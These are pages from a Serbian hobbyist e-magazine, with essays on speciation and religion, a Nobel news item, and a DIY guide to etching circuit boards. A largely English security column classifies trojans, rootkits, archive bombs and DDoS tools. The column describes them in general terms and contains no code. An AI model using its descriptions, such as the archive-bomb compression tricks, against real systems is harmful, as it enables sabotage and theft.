Ne tako davno smo mislili da znamo kako nastaju vrste. Verovali smo da taj proces gotovo uvek započinje potpunomizolacijom neke populacije. Biolozi još uvek misle da je geografska izolacija važan faktor, ali su se ideje udaljile odslučajnosti i malih populacija. Drugi važni faktori su ekološka selekcija (gde se nove vrste formiraju kao rezultatprilagođavanja promenljivim uslovima) i seksualna selekcija (gde izbor određenih seksualnih karakteristika vodirazilaženju unutar populacije).

Jedna od najbojih ilustracija moći ekološke selekcije je paralelno nastajanje vrsta, gde se gotovo iste vrste javljajunezavisno na različitim lokacijama kao odgovor na sličnu sredinu. Seksualna selekcija se može zasnivati, kao kododređene vrste tropskih riba, na sposobnosti ženskih jedinki da prave razliku između različito obojenih mužjaka i na tajnačin biraju samo one čije im boje više odgovaraju. Tako se može desiti da se populacije riba koje izgledaju slično moguizolovati u reprodukciji što bi kasnije dovelo do nastanka nove vrste.

U teoriji, može se testirati šta je uzrok nastajanja vrsta, traženjem »gena specijacije« - koji su odgovorni za sprečavanjeparenja unutar različitih vrsta. Što se više genoma ispituje, naučnici su sve nestrpljiviji za pronalazak takvih gena.

Da li se evolucija moze predvideti?

Evolucija proizlazi iz ponavljajuće interakcije slučajnih i selektivnih sila. Postojanje nasumičnog elementa (mutacija,rekombinacija i migracija) i slučajnosti koje mogu uticati na preživljavanje jedinke i verovatnoću nalaženja para, sugerišuda se evolucija ne može ponavljati, predvideti, ona ne prati pravila.

Ipak, kao što je Darvin primetio, slučajnost deluje rame uz rame sa prirodnom selekcijom. Njegova teorija predviđa da ćese organizmi prilagoditi svojoj sredini. Međutim, svaka predviđanja na osnovu Darvinove teorije su nepouzdana.

Danas postoji sve više dokaza za postojanje određenih osnovnih pravila evolucije. Bolje razumevanje mehanizamaevolucije pruža nagoveštaje da su određeni ishodi verovatniji od drugih. lako postoji ograničen broj uspešnih rešenja za

Page 29: Net Majstor E-magazin Broj 3

određeni izazov evolucije, postoji više načina za dostizanje istog rešenja. Evolucija se samo ponavlja ako određenefenotipske inovacije imaju visoku verovatnoću za nastajanje ili ih favorizuje selekcija. Kada bi se evolucija ponovo desila,Homo sapiens možda i ne bi evoluirao, ali postoji verovatnoća da bi se to dogodilo kod nekih drugih organizama, takođesa dve noge i dva oka.

Kakve veze sa ovim ima Bog?

Religija deluje u oblasti metafizike i nije podložna naučnom ispitivanju, ali možda i postoji naučno objašnjenje zaštoreligija postoji i kada se javila tokom evolucije.

Ljudi poseduju jednu karakternu crtu koja ih razlikuje od drugih životinja, a to je neobična spremnost da se prihvati voljaili neka velika ideja zajednice kojoj se pripada, pa čak i da se za nju pogine. Da bi ovo funkcionisalo, pojedinac mora dabude spreman da žrtvuje trenutne lične interese za dobitak na duge staze. Takođe, potrebna je i određena zaštita odsocijalnih parazita - koji uživaju koristi života u društvu, ali ne plaćaju cenu. Religija nudi rešenje za oba problema jerobjavljuje da postoji pretnja od intervencije sile koja nije pod Ijudskom kontrolom, a deluje momentalno ili nakon smrti.Ideja o bogovima se u evoluciji javila sa razvitkom mozga, kako bi omogućila održavanje stabilnosti u velikoj Ijudskojzajednici. Pojavila se nakon što su se pojavili anatomski moderni Ijudi godina i posle nastanka jezika koji je uslov za njenopostojanje.

I dok se religija može posmatrati kao efikasno sredstvo za kažnjavanje, postoji i njena pozitivnija strana, ona je način dase pojača produktivnost grupe, ona je odbrambeni zid od nesavršenosti sveta.

Podmetanjem nedodirljivog, nedokazivog, religija možda jeste učinila prevaru - možda i nije ali je uspela nešto što nauci,na dužu stazu, nikada nije polazilo za rukom da pruži utehu ma gde ona bila.

Nobelova nagrada za otkrice koje je omogucilo hard diskove

Krajem osamdesetih godina prošlog veka, Francuz Albert Fert i Nemac Peter Grünberg su otkrili pojavu koja se danasnaziva magnetorezistansa, odnosno magnetorezistivnost. Reč je o fenomenu koji je omogućio postojanje hard diskova isvih sličnih sistema za skladištenje podataka na bazi magneta. Nobelov Komitet je objavio, dvadesetak godina kasnije, daće dvojici naučnika biti uručena Nobelova nagrada za fiziku zbog ovog otkrića. Oni su 1994. godine dobili McGroddynagradu, zajedno sa Stjuartom Parkinom. Fert je objavio svoja otkrića u Physical Review Letters (PRL) časopisu 21.novembra 1988. godine, a njegov rad je i dalje u listi 10 najčešće citiranih radova u istoriji časopisa.Grünberg, sa druge strane, nije objavio svoj rad do 1. marta 1989. godine, ali ga je nadležnim insititucijama dao na uviddevet meseci ranije. Obojici je priznato da su opisali i tačno razjasnili fenomen magnetorezistivnosti, te će sada podelitiNobelovu nagradu. Pored prestiža, slave, priznanja i časti, podeliće i oko 1.5 miliona dolara novčane nagrade.

Uputstvo za izradu stampanih plocica

1. UVOD

Štampana plocica (PCB - printed circuit board) može da se uradi rucno ili mašinski. Ovde ce biti opisane verzije rucneizrade za amaterske potrebe. Prvo je potrebno izabrati odgovarajuci materijal za izradu, pa pristupiti izradi PCB-a, koja sesastoji iz nekoliko faza. Faze u izradi su sledece: isecanje plocice, cišcenje bakarne površine, zaštita površina koje želimoda imamo na PCB-u, nagrizanje nepotrebnih bakarnih površina (ecovanje), skidanje zaštite sa bakra, bušenje, zaštitagotove plocice, kalajisanje, finalna obrada. U zavisnosti od nacina izrade i potreba, redosled može da bude i drugaciji, aneke faze da se izostave.

2. MATERIJAL ZA IZRADU

Page 30: Net Majstor E-magazin Broj 3

Za izradu PCB-a koriste se pertinaks i vitroplast koji mogu da budu jednostrani i dvostrani, tj. da imaju bakar nanet sajedne ili obe strane. Pertinaks se uglavnom koristi za prototipove i hobi potrebe, dok se za izradu visokokvalitetnihplocica koristi iskljucivo vitroplast, mada može da se koristi i za hobi potrebe, ali je nešto skuplji od pertinaksa.Jednostrani pertinaks cete vrlo lako prepoznati "na oko" po boji koja je se krece od svetlo do tamno braon i nijeprovidan. Doduše, ni vitroplast nije providan dok se ne ukloni bakar, ali se vrlo lako razlikuje od pertinaksa. Dvostranipertinaks je malo teže razlikovati "na oko" od vitroplasta jer su obe površine prekrivene bakrom, pa je potrebno maloiskustva.

3. ISECANJE

S obzirom da je pertinaks vrlo krt materijal, treba biti pažljiv pri isecanju da plocica ne pukne tamo gde ne treba. Jedanod sigurnijih nacina je korišcenje skalpera; zasecite sa obe strane skalperom nekoliko puta i jednostavno odlomite poliniji. Moguce ga je iseci i necim drugim, npr. makazama za lim, ali se u tom slucaju ivice iskrzaju pa je potrebna dodatnaobrada. Da napomenemo i secenje malim modelarskim cirkularom, ali u tom slucaju treba uzeti u obzir da rez imaodredjenu debljinu, pa treba voditi o tome racuna pri obeležavanju linije za secenje. Vitroplast se ne može iseciskalperom jer je vrlo tvrd, ali se zato on odlicno sece makazama za lim, kako rucnim tako i stolnim, a takodje se možeseci modelarskim cirkularom, ali ce se nekvalitetna testera brzo istupiti zbog njegove velike tvrdoce . Ako je potrebno,nakon isecanja treba "oboriti" ivice šmirglom ili turpijom.

4. CIŠCENJE BAKARNE POVRŠINE

Ako je bakar oksidirao ili je zamašcen zbog pipanja prstima, treba ga ocistiti kako bi se materijal za zaštitu dobroprihvatio za bakar. Za skidanje oksidacije može da se upotrebi fina šmirgla ili neki drugi abrazivni materijal, a zaodmašcivanje je najbolje upotrebiti neki deterdžent za sudove ili slicno sredstvo.

5. ZAŠTITA POVRŠINA KOJE SU NAM POTREBNE

Za zaštitu bakarnih površina koje su nam potrebne i koje predstavljaju vodove, lemne tacke i ostale površine koje želimoda imamo na PCB-u, postoji puno metoda, a ovde ce biti opisan veci deo.

FLOMASTER - ovo je jedan od najbržih nacina kada Vam nije bitan izgled, jer linije i lemne tacke ne izgledaju estetski. Akohocete, možete da upotrebite lenjir za povlacenje linija, kako bi plocica izgledala nešto lepše. Potrebno je koristiti nekiflomaster koji je otporan na nagrizanje; najcešce su to tzv. alkoholni flomasteri, ali nisu svi podjednako otporni nahemikaliju. Ako je to jedina tehnika kojom radite plocice, preporucujem da nabavite flomastere iz serije "EDDING"(postoje i drugi kvalitetni flomasteri) koje možete naci u CONRAD-u; jeste da su nešto skuplji, ali je kvalitet vrhunski, aima ih sa nekoliko debljina vrha.

LAK ZA NOKTE - pretpostavljam da se poneko i nasmeje pri samom pomenu ove tehnike, ali se ta tehnika vrlo uspešnokoristila jer nije bilo moguce naci kvalitetan flomaster, a koristi se i danas u manjoj meri. Iako daje rezultate lošije odflomastera (gledano sa estetske strane), lak je otporniji na hemikalije, pa ako ste ostali bez flomastera ili nematekvalitetan flomaster, ovo može da bude odlicna zamena. Ako se razredi, moguce ga je sipati u rapidograf sa debljimvrhom.

RAPIDOGRAF - ako imate rapidograf, možete u njega da sipate tecnost otpornu na nagrizanje (npr. lak za nokte, mastiloza alkoholne flomastere) i njime da crtate PCB. Ako smatrate da jedan prolaz nije dovoljan, uradite i drugi, ali tadanemojte da vucete po vec postojecoj liniji, nego "tackajte" po njoj, kako ne bi ste izgulili prethodni sloj. Ovom tehnikommogu da se dobiju vrlo tanke linije (ako imate rapidograf sa tankim vrhom) koje su potrebne ako provlacite linije izmedjunožica nekog IC-a. PAZITE da Vam se tecnost u rapidografu ne osuši jer može da se desi da rapidograf postane trajnoneupotrebljiv.

SELOTEJP - još jedna "smešna" tehnika, ali je ona odigrala veliku ulogu u "kamenom dobu" izrade PCB-a. Sastoji se ulepljenju selotejp trake na bakar i isecanju skalperom i uklanjanju nepotrebnih parcica. Važno je da se zalepljeni selotejpdobro pritisne, kako se hemikalija ne bi podvukla pod neku ivicu i odlepila ga. Danas ta tehnika može da se koristi ako na

Page 31: Net Majstor E-magazin Broj 3

PCB-u imate debele linije i velike kvadratne površine.

LETRASET - to je, u stvari, set preslikaca prilogodjenih za izradu PCB-a. Postoje linije raznih debljina kao i lemne tackeraznih velicina i oblika. Nanosi se kao i svaki preslikac, postavljanjem na bakar i prelaskom tupim vrhom preko njega (npr.standardnom grafitnom olovkom). Iako izrada ovim nacinom zahteva malo više vremena, rezultati mogu da budu odlicni.

Sve do sada navedene tehnike zahtevaju da se prvo obeleže tacke koje predstavljaju lemna mesta, kako bi se znalo kudatreba vuci linije. Jedna od tehnika kojom to možete da uradite sastoji se u sledecem: odštampajte na papir izgled PCB-a ito gledano sa strane bakra, zatim taj papir pricvrstite za pertinaks ili vitroplast i tackašem (kirnerom) obeležite lemnamesta, skinite papir i crtajte. Ako Vam tako odgovara, pre crtanja možete da izbušite rupice. Opisanim tehnikamapodjedanko se rade jednostrane i dvostrane plocice, s tim što je za izradu dvostranih neophodno izbušiti rupice precrtanja vodova. Sledi opis tehnika kod kojih ne samo da ne treba obeležiti lemna mesta tackašem, vec to nijepreporucljivo, jer može doci do nepoklapanja izmedju obeleženih i stvarnih lemnih mesta. Jedino je kod izradedvostranih PCB-a potrebno izbušiti nekoliko referentnih rupica radi poklapanja gornje i donje strane.

TRANSFER FOLIJA - ova tehnika se sastoji u štampanju izgleda PCB-a laserom na specijalnoj foliji (mada mogu da sekoriste i standardne, ali tada treba uzeti kvalitetnije) i termickom prenosu tonera na bakar. Za prenos je najboljepostaviti plocicu na blago zagrejanu ringlu tako da se bakar nalazi sa gornje strane, staviti foliju preko bakra i gumenimvaljkom pritiskati preko sve dok toner ne predje na bakar. Iako ova tehnika deluje kao savršena, može da donese mnogonerviranja jer je potrebno ostvariti idelane uslove za dobar kvalitet; potrebna je dobra folija, kvalitetan otisak na laseru,ravna bakarna površina na plocici, dobro podešena temperatura. Sve u svemu, tehnika je pogodna samo za prototipove.

FOTO POSTUPAK - ova tehnika je pogodna kako za izradu jednog komada, tako i za manje serije, a dobijeni rezultatimogu da budu ravni profesionalnim. Iako mogu da se kupe plocice vec oslojene foto lakom, ako cesto radite plocice,jeftinije je da kupite foto lak, POZITIV 20, koji može da se nadje u bocicama spreja zapremine 100 i 200 ml (cuvanjemspreja pod odgovarajucim uslovima, vek trajanja može da bude i dve godine). Kompletan opis postupka procitajte ovde.

SITO ŠTAMPA - tehnika izrade PCB-a sito štampom ista je kao i za standradno štampanje sitom. Ova tehnika se koristi zaizradu vece kolicine PCB-a, jer je prilicno skupa za izradu jednog komada; rezultati dobijeni ovom tehnikom su odlicni, pase koristi kako za amaterske, tako i za profesionalne potrebe. Pre stavljanja plocice pod sito OBAVEZNO proverite danema oštrih ivica na njoj, jer u protivnom može da dodje do trajnog oštecenja, tj. cepanja sita.

Ako je nekom od poslednje tri opisane tehnike potrebno uraditi dvostrani PCB, potrebno je prvo izbušiti nekolikoreferentnih rupica, kako bi mogle da se poklope gornja i donja strana. Vrlo je važno da se pri bušenju tih rupica bušilicadrži pod uglom od 90 stepeni u odnosu na PCB, jer u suprotnom nece biti moguce dobro poklopiti obe strane.

6. NAGRIZANJE (ECOVANJE)

Nakon zaštite bakarnih površina koje želimo da ostanu na PCB-u, potrebno je ukloniti bakar koji nam nije potreban. Tajpostupak se naziva nagrizanje ili ecovanje i najcesce se radi pomocu jedne od dve hemikalije. Prva se zove ferihlorid(FeCl3 - gvoždje III hlorid) i može da se kupi u specijalizovanim prodavnicama i to u dva oblika, tecnom i kristalnom. Akokupite tecnost, odmah u nju možete da ubacite plocicu, a ako kupite kristale, potrebno ih je prema priloženom uputstvurastvoriti u vodi. Isti rastvor može da se koristi više puta, sve dok nagriza bakar. Bolje je da sipate u posudu samo onolikorastvora koliko Vam je potrebno, i da taj upotrebljeni rastvor cuvate u posebnoj posudi; kada taj rastvor prestane danagriza, uzmite neupotrebljeni i to opet onoliko koliko Vam je potrebno. Vreme potrebno da se ukloni suvišan bakarzavisi od koncentracije i temeprature rastvora, kao i od zasicenosti vec korišcenog rastvora.Druga hemikalija koja se koristi za nagrizanje pravi se od vode, sone kiseline (HCl) i hidrogena (H2O2); sonu kiselinumožete naci u svakoj samousluzi, a hidrogen u apoteci ili frizerskom salonu. Jedan od recepata za pravljenje rastvora zanagrizanje, koji se nalazi u uputstvu koje stiže uz foto lak, glasi ovako: za 1 litar rastvora potrebno Vam je 770 ml vode,200 ml 35% sone kiseline i 30 ml 30% hidrogena. Pošto je malo teže naci 35% kiselinu, možete da smanjite kolicinu vode,a povecate kolicinu kiseline. Licno ne koristim taj recept, pošto koristim kiselinu 18% i hidrogen 30%, i to bez vode.Kolicinu hidrogena odredjujem prema reakciji; ako posle desetak sekundi rastvor ne pocne da menja boju u zelenu,dodam još hidrogena, a ako je rekacija previše burna, tj. razvija se velika kolicina mehurica, dodam malo kiseline.

Page 32: Net Majstor E-magazin Broj 3

Obratite pažnju da je ovaj rastvor jako isparljiv i OTROVAN, pa se ne preporucuje njegovo korišcenje u zatvorenimprostorijama. Vreme potrebno za nagrizanje zavisi najviše od odnosa kiseline i hidrogena, ali i od temperature. Nepreporucuje se ponovno korišcenje jednom upotrebljnog rastvora, pa sipajte u posudu samo onoliko rastvora koliko jepotrebno. Nakon što je sav nepotreban bakar uklonjen, plocicu je potrebno dobro isprati vodom.

7. SKIDANJE ZAŠTITE SA BAKRA

Nakon što je sav nepotreban bakar uklonjen, treba skinuti sloj kojim smo zaštili bakarne površine koje su nam potrebne.Za skidanje flomastera, najbolje je upotrebiti medicinski alkohol; za skidanje laka za nokte, aceton; za skidanje selotejpatreba trljati pod mlazom vode ili premazati nitro razredjivacem i kada se sve skine, ponovo dobro ocistiti nitrorazredjivacem kako bi se uklonio preostali lepak. Letraset se može ukloniti alkoholom ili nitro razredjivacem; foto lak isloj tonera takodje nitro razredjivacem, a farba naneta sito štampom se uklanja sredstvom predvidjenim za tu farbu.Svaku od ovih zaštita (sem salotejpa) možete da uklonite i finom šmirglom, ali to treba izbegavati, jer je bakarni slojionako tanak, pa ga ne treba dodatno tanjiti.

8. BUŠENJE

Najlakše je izbušiti plocicu pomocu male modelarske bušilice. Najcešce ce Vam trebati burgije precnika od 0,7mm do 1,2mm, mada je poželjno imati i burgije od 1,5 mm, 2 i 3 mm. Postoje standardne i specijalne burgije; standardne burgije ceVam biti dovoljne za bušenje pertinaksa, dok ce Vam, ako cesto koristite vitroplast, biti neophodne specijalne burgije, jerse standardne istupe posle par desetina izbušenih rupica (ako ste vešti, možete da ih naoštrite). Iako su specijalneburgijice skupe, za veliki broj rupica u vitroplastu prakticno su neophodne, ali je potrebno pažljivo rukovati sa njima jersu krte i vrlo lako pucaju. Za one koji nemaju dovoljno iskustva, za njihovo korišcenje preporucuje se nabavka stalka zabušilicu. Ako je ne slomite, moci cete, verovali ili ne, sa jednom burgijicom da izbušite nekoliko desetina hiljada rupica !

9. ZAŠTITA GOTOVE PLOCICE

Zaštita se vrši da bi se bakar zaštitio od oksidacije i time se produžio vek plocici. Za amaterske potrebe najjednostavnijeje plocicu premazati rastvorom alkohola i kalafonijuma, ili nitrorazredjivaca i kalafonijuma. Time se pored zaštiteostvaruje i lakše lemljenje, pa je to vrlo poularan metod. Za profesionalnu primenu, plocice se zašticuju posebnim tzv.lot-stop lakom koji se nanosi sito štampom, a "maska" je takva da se lakom pokriva sve sem lemnih tacaka, cime seomogucava nesmetano lemljenje.

10. KALAJISANJE

Kalajisanje može da se vrši rucno ili mašinski. Najcešca rucna metoda se sastoji u prethodnom premazivanju plocicerastvorom kalafonijuma u alkoholu ili nitro razredjivacu, kako bi se olakšalo nanošenje kalaja na bakar. Zatim selemilicom sa adekvatno oblikovanim vrhom nanosi kalaj u tankom sloju po vodovima i lemnim tackama. U tom slucaju,to je ujedno i zaštita plocice, pa se posle kalajisanja može (ali ne mora) skinuti sasušeni premaz rastvora sa plocice nitrorazredjivacem. Ako je plocica zašticena lot-stop lakom, kalajišu se, logicno, samo lemne tacke.

11. FINALNA OBRADA

U finalnu obradu spada sve što je potrebno uraditi na plocici pre samog lemljenja, a to može da bude isravljanje uocenihnedostataka (npr. izbušiti preskocenu rupicu), obrada ivica plocice ili štampanje rasporeda i oznaka elemenata. Nakontoga, plocica je spremna za lemljenje.

Pošto poslednje tri faze nisu neophodne, možete ih preskociti sve ili samo neku od njih.

Page 33: Net Majstor E-magazin Broj 3

Sigurnost I zastitaSledeca rubrika je napisana na engleskom jeziku jer nismo imali vremena da prevodimo. Nadamo se darazumete engleski jezik I da necete imati problema sa razumevanjem Sigurnost i zastita rubrike.

Trojan Programs

Trojans can be classified according to the actions which they carry out on victim machines.

· Backdoors· General Trojans· PSW Trojans· Trojan Clickers· Trojan Downloaders· Trojan Droppers· Trojan Proxies· Trojan Spies· Trojan Notifiers· ArcBombs· Rootkits

Backdoors

Today backdoors are the most dangerous type of Trojans and the most widespread. These Trojans are remoteadministration utilities that open infected machines to external control via a LAN or the Internet. They functionin the same way as legal remote administration programs used by system administrators. This makes themdifficult to detect.

The only difference between a legal administration tool and a backdoor is that backdoors are installed andlaunched without the knowledge or consent of the user of the victim machine. Once the backdoor is launched, itmonitors the local system without the user's knowledge; often the backdoor will not be visible in the log ofactive programs.

Once a remote administration utilitiy has been successfully installed and launched, the victim machine is wideopen. Backdoor functions can include:

· Sending/ receiving files· Launching/ deleting files· Executing files· Displaying notification· Deleting data· Rebooting the machine

In other words, backdoors are used by virus writers to detect and download confidential information, executemalicious code, destroy data, include the machine in bot networks and so forth. In short, backdoors combine thefunctionality of most other types of Trojans in one package.

Page 34: Net Majstor E-magazin Broj 3

Backdoors have one especially dangerous sub-class: variants that can propagate like worms. The onlydifference is that worms are programmed to propagate constantly, whereas these 'mobile' backdoors spread onlyafter a specific command from the 'master'.

General Trojans

This loose category includes a variety of Trojans that damage victim machines or threaten data integrity, or impair thefunctioning of the victim machine.

Multi-purpose Trojans are also included in this group, as some virus writers create multi-functional Trojans rather thanTrojan packs.

PSW Trojans

This family of Trojans steals passwords, normally system passwords from victim machines. They search forsystem files which contain confidential information such as passwords and Internet access telephone numbersand then send this information to an email address coded into the body of the Trojan. It will then be retrieved bythe 'master' or user of the illegal program.

Some PSW Trojans steal other types of information such as:

· System details (memory, disk space, operating system details)· Local email client· IP-address· Registration details· Passwords for on-line games

Trojan-AOL are PSW Trojans that steal passwords for aol (American Online) They are contained in a sub-groups because they are so numerous.

Trojan Clickers

This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickerseither send the necessary commands to the browser or replace system files where standard Internet urls arestored (e.g. the 'hosts' file in MS Windows).

Clickers are used:

· To raise the hit-count of a specific site for advertising purposes· To organize a DoS attack on a specified server or site· To lead the victim to an infected resource where the machine will be attacked by other malware (viruses

or Trojans)

Trojan Downloaders

This family of Trojans downloads and installs new malware or adware on the victim machine. The downloader theneither launches the new malware or registers it to enable autorun according to the local operating system requirements.All of this is done without the knowledge or consent of the user.

Page 35: Net Majstor E-magazin Broj 3

The names and locations of malware to be downloaded are either coded into the Trojan or downloaded from a specifiedwebsite or other Internet location.

Trojan Droppers

These Trojans are used to install other malware on victim machines without the knowledge of the user.Droppers install their payload either without displaying any notification, or displaying a false message about anerror in an archived file or in the operating system. The new malware is dropped to a specified location on alocal disk and then launched.

Droppers are normally structured in the following way:

The dropper functionality contains code to install and execute all of the payload files.

In most cases, the payload contains other Trojans and at least one hoax: jokes, games, graphics and so forth.The hoax is meant to distract the user or to prove that the activity caused by the dropper is harmless, whereas itactually serves to mask the installation of the dangerous payload.

Hackers using such programs achieve two objectives:

· Hidden or masked installation of other Trojans or viruses· Tricking antivirus solutions which are unable to analyse all components

Trojan Proxies

These Trojans function as a proxy server and provide anonymous access to the Internet from victim machines. Todaythese Trojans are very popular with spammers who always need additional machines for mass mailings. Virus coders willoften include Trojan-proxies in Trojan packs and sell networks of infected machines to spammers.

Trojan Spies

This family includes a variety of spy programs and key loggers, all of which track and save user activity on thevictim machine and then forward this information to the master. Trojan-spies collect a range of informationincluding:

Page 36: Net Majstor E-magazin Broj 3

· Keystrokes· Screenshots· Logs of active applications· Other user actions

These Trojans are most often used to steal banking and other financial information to support online fraud.

Trojan Notifiers

These Trojans inform the 'master' about an infected machine. Notifiers confirm that a machine has been successfullyinfected, and send information about IP-address, open port numbers, the email address etc. of the victim machine. Thisinformation may be sent by email, to the master's website, or by ICQ.

Notifiers are usually included in a Trojan 'pack' and used only to inform the master that a Trojan has been successfullyinstalled on the victim machine.

Rootkits

A rootkit is a collection of programs used by a hacker to evade detection while trying to gain unauthorized access to acomputer. This is done either by replacing system files or libraries, or by installing a kernel module. The hacker installsthe rootkit after obtaining user-level access: typically this is done by cracking a password or by exploiting a vulnerability.This is then used to gather other user IDs until the hacker gains root, or administrator, access to the system.

The term originated in the Unix world, although it has since been applied to the techniques used by authors ofWindows-based Trojans to conceal their actions. Rootkits have been used increasingly as a form of stealth to hide Trojanactivity, something that is made easier because many Windows users log in with administrator rights.

ArcBombs

These Trojans are archived files coded to sabotage the de-compressor when it attempts to open the infected archivedfile. The victim machine will slow or crash when the Trojan bomb explodes, or the disk will be filled with nonsense data.ArcBombs are especially dangerous for servers, particularly when incoming data is initially processed automatically: insuch cases, an ArcBomb can crash the server.

There are three types of ArcBombs: incorrect header in the archive, repeating data and a series of identical files in thearchive.

An incorrect archive header or corrupted data can both cause the de-compressor to crash when opening and unpackingthe infected archive.

A large file containing repeating data can be packed into a very small archive: 5 gigabytes will be 200 KB when packedusing RAR and 480 KB in ZIP format.

Moreover, special technologies exist to pack an enormous number of identical files in one archive without significantlyaffecting the size of the archive itself: for instance, it is possible to pack 10100 identical files into a 30 KB RAR file or a 230KB ZIP file.

Page 37: Net Majstor E-magazin Broj 3

Other Malware

Other malware includes a range of programs that do not threaten computers directly, but are used to create viruses orTrojans, or used to carry out illegal activities such as DoS attacks and breaking into other computers.

· DoS and DDoS Tools· Hacker Tools and Exploits· Flooders· Constructors and VirTools· Nukers· FileCryptors and PolyCryptors· PolyEngines

DoS and DDoS Tools

These programs attack web servers by sending numerous requests to the specified server, often causing it to crashunder an excessive volume of requests. If the server is not backed by additional resources, it will signal the failure toprocess requests by denying service. This is why such attacks are called Denial of Service attacks.

DoS programs conduct such attacks from a single computer with the consent of the user. Distributed Denial of Service(DDoS) attacks use a large number of infected machines without the knowledge or consent of their owners. DDoSprograms can be downloaded onto victim machines by various methods. They then launch an attack either based on adate included in the code or when the 'owner' issues a command to launch the attack.

Worms can carry a DoS procedure as part of their payload. For instance, on August 20, 2001, the CodeRed wormlaunched a successful attack on the official web site of the President of the USA (Whitehouse). Mydoom.a containedDDoS code directed against SCO's corporate site. The company, a Unix developer, closed the site on February 1, 2004,shortly after the beginning of the DdoS attack and moved it to a different URL.

Hacker Tools and Exploits

These utilities are designed to penetrate remote computers in order to use them as zombies (by using backdoors) or todownload other malicious programs to victim machines.

Exploits use vulnerabilities in operating systems and applications to achieve the same result.

Flooders

These utilities are used to flood data channels with useless packets and emails.

Constructors and VirTools

Virus writers use constructor utilities to create new malicious programs and Trojans. It is known that constructors tocreate macro-viruses and viruses for Windows are in existence. Constructors can be used to generate virus source code,object modules and infected files.

Some constructors come with a user interface where the virus type, objects to attack, encryption options, protectionagainst debuggers and dissasemblers, text strings, multimedia effects etc. can be chosen from a menu. Less complexconstructors have no interface, and read information about the type of virus to be built from the configuration file.

Page 38: Net Majstor E-magazin Broj 3

VirTools are all utilites created to simplify virus writing. They can also be used to analyze viruses to see how they can beused in hacking attacks.

Nukers

Hackers use these utilities to crash attacked machines by sending specially coded/phrased requests. These requestsexploit vulnerabilities in applications and operating systems to cause fatal errors.

FileCryptors and PolyCryptors

These are hacker utilities used by virus writers use to encrypt malicious programs to prevent them being detected byantivirus software.

PolyEngines

Polymorphic generators are not viruses in the true sense of the word. They do not propagate by opening, closing orwriting code into files or reading and writing sectors. These programs encrypt the body of the virus and generate a de-encryption routine.

Virus writers usually spread polymorphic generators as archived files. The main file in a generator archive is the objectmodule which contains the actual generator. This module always contains an external function that calls the generator.

(Deo rubrike koji je na srpskom jeziku.)

Malware (Malicious software) - maliciozni programi

Malware se deli u sledeće grupe:

1. Mrežni crvi su programi koji za propagaciju (širenje) koriste LAN ili Internet sa ciljem penetracijeudaljenih kompjutera, pokretanja vlastitih kopija na žrtvinom kompjuteru i daljeg širenja na nove sisteme.Gotovo svi crvi se šire kao datoteke u različitim oblicima, no, postoji i mali broj tkz. fileless ili packet crva kojise šire u obliku mrežnih paketa i direktno penetrišu RAM memoriju ciljnog kompjutera gde zatim njihov kodbiva izvršen. Crvi se klasifikuju prema načinu propagacije na sledeći način: 1. Email crvi - šire se putem inficiranih email poruka. Mogu biti u obliku attachment-a ili email možesadržati link ka malicioznoj internet stranici. Ova vrsta crva sakuplja email adrese sa žrtvinog kompjutera saciljem daljeg širenja. 2. Instant messaging crvi - šire se putem sistema/aplikacija za instant poruke (MSN, ICQ) slanjemlinkova ka inficiranim stranicama svima koji se nalaze u listi kontakata na žrtvinom kompjuteru. 3. Internet crvi - šire su kopiranjem crva u umrežene resurse, iskorišćavanjem propusta u operativnimsistemima da bi penetrisali kompjutere i/ili mreže te penetracijom javnih mreža i korišćenjem drugog malware-akao nosioca za crva. Mnogi crvi koriste kombinaciju više metoda propagacije kako bi bili efikasniji upenetraciji potencijalnih meta infekcije. 4. IRC crvi - šire se prvenstveno spamovanjem kontakata pronađenih u žrtvinom kompjuteru malicioznimlinkovima putem IRC chat kanala. 5. P2P crvi - šire se korišćenjem P2P mreža (mreža za razmenu datoteka) kopirajući se u deljene fascikle.

Page 39: Net Majstor E-magazin Broj 3

Složeniji P2P crvi imitiraju mrežni protokol ili određene P2P mreže pozitivno odgovarajući na sve zahteve inudeći kopiju crva umesto tražene datoteke.

*** 2. Virusi su vrsta malicioznog softvera koja širi vlastite kopije unutar pojedinog sistema sa ciljempokretanja/izvršavanja malicioznog koda kada korisnik preduzme određenu akciju ili penetracije nekog drugogresursa unutar žrtvinog kompjutera. Virusi, za razliku od crva, ne koriste mrežne resurse za penetraciju u sistem.Kopije virusa mogu penetrisati druge kompjutere samo ako se inficiranom objektu pristupi i ako kod budepokrenut od strane korisnika. Iz tog razloga, virusi se integrišu u izvršive datoteke legitimnih programa. Premanačinu ponašanja nakon izvršenja, moguće ih je klasifikovati u dve grupe: * nerezidentni virusi: po izvršavanju odmah traže druge datoteke koje bi mogle biti inficirane, inficirajuih i predaju kontrolu legitimnom programu; * rezidentni virusi: po učitavanju u memoriju odmah predaju kontrolu legitimnom programu i ostajuaktivni u pozadini i inficiraju nove datoteke kada im pristupe drugi programi ili operativni sistem. U zavisnosti od okruženja u kome virusi deluju, moguće ih je podeliti u sledeće grupe: 1. Datotečni virusi koriste datotečni sistem datog operativnog sistema za propagaciju. Dele se na: * one koji inficiraju izvršive datoteke (najveća grupa); * one koji kreiraju duplikate datoteka (companion virusi); * one koji kreiraju vlastite kopije u različitim direktorijima; * one koji koriste određene mogućnosti datotečnog sistema (link virusi). 2. Boot sector virusi se upisuju ili u boot sector ili MBR (master boot record) ili modifikuju lokacijuaktivnog boot sector-a. Ranije su bili široko rasprostranjeni, ali su skoro nestali uvođenjem 32-bitnih procesora iređim korišćenjem floppy diskova. 3. Macro virusi se gotovo isključivo pišu za MS Office aplikacije (Word, Excel, PowerPoint) koje čuvajuinformacije u OLE2 formatu. Ovi virusi za propagaciju koriste svojstva macro jezika sa ciljem transfera iz jedneinficirane datoteke u drugu. 4. Script virusi predstavljaju podgrupu datotečnih virusa i pisani su u različitim script jezicima (VBS,JavaScript, BAT, PHP itd). Oni inficiraju neke druge skripte ili čine deo više-komponentnih virusa. Ovi virusimogu inficirati i druge tipove datoteka (npr. HTML) ukoliko datotečni format podržava izvršavanje skripti.

